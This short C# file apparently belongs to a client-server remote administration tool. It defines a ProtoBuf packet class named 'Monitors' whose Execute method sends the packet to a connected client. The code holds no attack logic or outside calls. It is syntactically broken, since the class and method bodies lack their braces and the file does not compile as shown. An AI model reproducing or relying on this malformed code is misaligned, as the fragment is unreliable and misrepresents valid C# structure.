using ProtoBuf;
namespace xServer.Core.Packets.ServerPackets
{
[ProtoContract]
public class Monitors : IPacket
public Monitors() { }
public void Execute(Client client)
client.Send<Monitors>(this);
}